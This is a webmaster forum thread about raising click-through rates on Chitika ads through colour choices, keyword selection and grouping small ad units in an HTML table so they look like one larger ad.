I am running Chitika in my site http://www.setsms.com and soo far it making much better amount then adsense.... but i want to make it more working for me, somehow a good CTR. Plz give me some advice on Placement of Ads, color's, and also a very imporatant thing Keywords... 1) what key words you would advice me? 2) where to place ads? 3) what about look anf feel (colors) ? plz Advice me by the way what will you do if its your site. Thanks a lot.
Your site is not loading properly. But I did finally get it to partially load and I think you should change the background of your Chitika ads to White. They would blend in better with the site then. It looks odd when the background is a different colour than white because the product image background is still white.
Really :| but its opening fine at my end... anyone else having this problem ??? also tell your Advice.

OK Guys.... Site server is Ok now and working Fine... can u now plz give me advice for better CTR rate,... and better ads placement + Color looks. Thanks
I found that putting four 180*150 small rectangle banners beside eachother in a table with the same background color as the ads, and no border on the ads so it looks like one big ad really helps. Once I did that, my clickthrough rate trippled People don't seem to like clicking single ads, but when there is a group of 3 or 4 people seem to suddenly be interested...
I have the same setup on my site you just have to make sure the keywords are different for each ad and that the keywords really fit your site topic for best results.
Those are very good ideas, S2X. I think I'm going to try them. But is there a way for the borders not to show? Even if I make the background color of the ads the same as that of the table, the (white) border around the ads are still showing.
The color doesn't look good. Don't worry too much about the border. Break it into 3-4 small unit ads (160x160) will increase CTR White border: ch_color_border = "#FFFFFF";
Here is how I have mine set up: <table bgcolor="#ffffff" width="100%" cellpadding="0" cellspacing="0" border="0" style="border: 1px solid #000000;"> <tr> <td align=center> $chitika1 // White border, and white background. </td> <td align=center> $chitika2 </td> <td align=center> $chitika3 </td> <td align=center> $chitika4 </td> </tr> </table> Code (markup): This way there is no border on the actual chitika boxes, so they all sort of blend into the big white box, and there is a 1px border around all of the ads. If any of you guys havn't tried it, you really should test it out. This is one of the most effective ways to increase your CTR, Chitika actually has a higher CTR then adsense on my websites now. My problem, like most people have with chitika, is that my websites are content-based rather then product based. Putting up regular banners just doesn't attract people, however huge ad units like this really grab the attention of viewers. --- Another thing that works REALLY well is putting this same thing below news posts, and forum threads (only about 2 ads when you do this though)
hey bizpro, automatically set a channel for each keyword this one's really useful, gives each keyword you use it's own seperate channel, allowing you to track each keyword individually
